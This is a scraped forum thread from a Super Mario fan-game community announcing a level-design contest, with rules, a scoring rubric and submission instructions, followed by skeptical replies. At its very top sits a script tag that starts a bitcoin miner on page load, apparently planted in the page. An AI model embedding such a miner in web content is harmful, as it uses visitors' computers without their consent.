<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

Grand Extravaganza Contest 1

would you like to participate in some fun contests? would you like to create some fun contests? well ^_^
Morse
Posts: 5
Joined: 3 weeks ago

Grand Extravaganza Contest 1

Postby Morse » 3 weeks ago

Hello everyone! I'm now proud to present my
GRAND EXTRAVAGANZA CONTEST
Anyone can participate, and everything will be made sure that everyone will be satisfied with this contest and will have a completely new experience!

Anyone who violates the rules will be disqalified.
RULES
- You are allowed to submit only one level. You may update your submission during the submission period. The latest submission will be judged. Submitting two levels and expecting both to be judged will lead to disqualification.
- You are allowed to work alone or with a partner. You may request a team name if you are working in a team.
- Level must be beatable with a 1.3.x variant of SMBX. No 2.0 or 1.4/38A levels are permitted.
- If you submit after the deadline has passed, penalties apply. Details below.
- Judges mustn't know which level is yours. Do not submit a level you have publicly showcased or released in the past.
- Include all LunaLua APIs you're using inside the level folder. Details below.
- SMBX 2.0 Characters are not allowed, since some of them will see revisions before the game gets released that might break compatibility. Other 2.0 features are allowed.
- Either specify which characters your level is made for or include a filter.
- Your level may not end in a warp exit.
- You may include one secret exit in your level. This exit has to end the level and can also not be a warp exit.
- Keep your music files short to reduce the filesize of your package. Converting music to .ogg format and adding loop points is encouraged, but not required.
- Judges are not allowed to submit levels.
- Test your level! Make sure events work, start position is correct, there are no errors, etc. Levels will be judged as they are submitted.
- By submitting you agree that your level will be included in an episode featuring all of the submissions.

Judging
Judges will submit a written review of each level and then score them based on the rubric below:
Design and Execution: 50 Points
In this category, the overall execution of a level is judged. This includes how the level's concept is executed, how fun the level is, the flow it has to it and the level's difficulty curve. A level should feel good to play, offer a variety of things executed with its concept while feeling coherent and not be boring or frustrating.
Creativity and Innovation: 30 Points
This category focuses on a level's personality, the factor which makes it stand out among others. Here, a level's presentation of its ideas and innovation is judged, both in an aesthetic, as well as a gameplay-specific sense.
Aesthetics and Composition: 20 Points
In this category, a level's overall look, feeling and atmosphere is judged. The level's aesthetics should thrive to improve upon the overall quality on the level and support the experience, rather than getting in the way of it.

LunaLua APIs
In case APIs get updated throughout submission period, judging period or the time it takes to create the game, you are required to include all APIs your level relies on locally inside your level folder. Rename all your APIs by prefixing their files with "local_". You have to rename them in the API.load call, too. Example:

NOTE: Hover mouse on black area to view the LunaLua API code.

CODE: SELECT ALL
local eventu = API.load("local_eventu")



Keep an eye on APIs that rely on other APIs in order to function. Please include and rename those, too. You can find these by searching for "loadSharedAPI", "loadAPI" or "API.load" inside the APIs you're using.

How to submit
- Submission procedures are similar to those for the Community Contests. PM me your level in a .zip archive to me and structure it like so:
- Music goes into the level folder to keep the episode folder organized and so we can easily tell which level uses which music.
- Do not include your username anywhere.
- Give your level a distinctive name. Try to be creative!
- You may include a readme if you want to give credits or want to write additional information. Again, remember to not put your name anywhere.
- Make sure the level and custom graphics folder share the same name, and make sure your readme includes your level's name. Name the archive after your level, too.
- Music can be one of many formats. .mp3, .ogg, .spc and .wav are the most commonly used ones. Same goes for sound effects.
- Your package should look something like this. Keep in mind that graphics, music and sound are not one file:
Image
- Outside the level folder:
Image
- Grab all the stuff in the 2nd image and neatly pack it into an archive to submit it:
Image

SUBMISSION DEADLINE
Your level must be submitted by 15 February 2018 11:59PM GMT. Penalized submissions will be taken up to 5 days after this date.

JUDGES (Bolded have submitted Reviews)
- None found currently...

PARTICIPANTS (Bolded have submitted levels)
- None found currently...

Have fun :D
Last edited by Morse on 29 Jan 2018, 14:41, edited 3 times in total.

User avatar
ano0maly
Retired Tester
Posts: 972
Joined: 6 years ago

Re: Grand Extravaganza Contest 1

Postby ano0maly » 3 weeks ago

Honestly, this feels like just a loose clone of MAGLX3, which we're set to have in the future. I don't think this will really get much, either because people are going to save up their level-making in anticipation of MAGLX3, or because of the general shrinking activity in the forums and waning interest in contests.

This also feels too sudden, without enough preparations, like how the deadline is supposed to be less than a month away but the judges aren't even decided yet.
Image
Image << Click!

Fan of the following:
Image Image

User avatar
Enjl
i consume the glitches
Posts: 250
Joined: 3 years ago

Re: Grand Extravaganza Contest 1

Postby Enjl » 3 weeks ago

ano0maly wrote: Honestly, this feels like just a loose clone of MAGLX3, which we're set to have in the future. I don't think this will really get much, either because people are going to save up their level-making in anticipation of MAGLX3, or because of the general shrinking activity in the forums and waning interest in contests.

This also feels too sudden, without enough preparations, like how the deadline is supposed to be less than a month away but the judges aren't even decided yet.
It's a carbon copy of SMBX Forums' Grand Extravaganza contest, which happened last year and partially inspired Sturg's rubric, so that's where that similarity comes from.
On a similar note, OP has been banned on said SMBX forums for certain reasons, so yeah...
ImageImageImageImageImageImageImage

Morse
Posts: 5
Joined: 3 weeks ago

Re: Grand Extravaganza Contest 1

Postby Morse » 3 weeks ago

Enjl wrote:
ano0maly wrote: Honestly, this feels like just a loose clone of MAGLX3, which we're set to have in the future. I don't think this will really get much, either because people are going to save up their level-making in anticipation of MAGLX3, or because of the general shrinking activity in the forums and waning interest in contests.

This also feels too sudden, without enough preparations, like how the deadline is supposed to be less than a month away but the judges aren't even decided yet.
It's a carbon copy of SMBX Forums' Grand Extravaganza contest, which happened last year and partially inspired Sturg's rubric, so that's where that similarity comes from.
On a similar note, OP has been banned on said SMBX forums for certain reasons, so yeah...
@ano0maly Enjl is right. It was a carbon copy, just like she said, but I was inspire by the structure of the contest, and I thought I wante to try that too :D

User avatar
Bean
>_>
Posts: 2041
Joined: 8 years ago

Re: Grand Extravaganza Contest 1

Postby Bean » 3 weeks ago

Please don't mass PM people again. If anyone's interested, they'll join. If not, they won't.

User avatar
Mata Hari
Posts: 2013
Joined: 8 years ago

Re: Grand Extravaganza Contest 1

Postby Mata Hari » 3 weeks ago

Enjl wrote: It's a carbon copy of SMBX Forums' Grand Extravaganza contest, which happened last year and partially inspired Sturg's rubric, so that's where that similarity comes from.
On a similar note, OP has been banned on said SMBX forums for certain reasons, so yeah...
Why is this dude so unrelenting in posting contests nobody seems interested in. What on earth

Morse
Posts: 5
Joined: 3 weeks ago

Re: Grand Extravaganza Contest 1

Postby Morse » 3 weeks ago

Mata Hari wrote:
Enjl wrote: It's a carbon copy of SMBX Forums' Grand Extravaganza contest, which happened last year and partially inspired Sturg's rubric, so that's where that similarity comes from.
On a similar note, OP has been banned on said SMBX forums for certain reasons, so yeah...
Why is this dude so unrelenting in posting contests nobody seems interested in. What on earth
Exactly! I was wondering the same thing :)
Last edited by Morse on 29 Jan 2018, 16:34, edited 4 times in total.

Morse
Posts: 5
Joined: 3 weeks ago

Re: Grand Extravaganza Contest 1

Postby Morse » 3 weeks ago

Bean wrote: Please don't mass PM people again. If anyone's interested, they'll join. If not, they won't.
I knew that already, so please don't tell me.

EDIT: I've learned that when I was at the SMBX Forums ok? >_>

Morse
Posts: 5
Joined: 3 weeks ago

Re: Grand Extravaganza Contest 1

Postby Morse » 3 weeks ago

NEW ANNOUNCEMENT
Today is Judge-finding Day (for me, or for everyone, i don't know >_>)! I am now beginning to search for Judges for my contest, and the contest is waiting for participants, so please don't rush making levels, because it takes time to get participants in the next two to five weeks or so lol.

Please stay tuned for more Announcements! :D


Return to “contest center”

Who is online

Users browsing this forum: No registered users and 2 guests

cron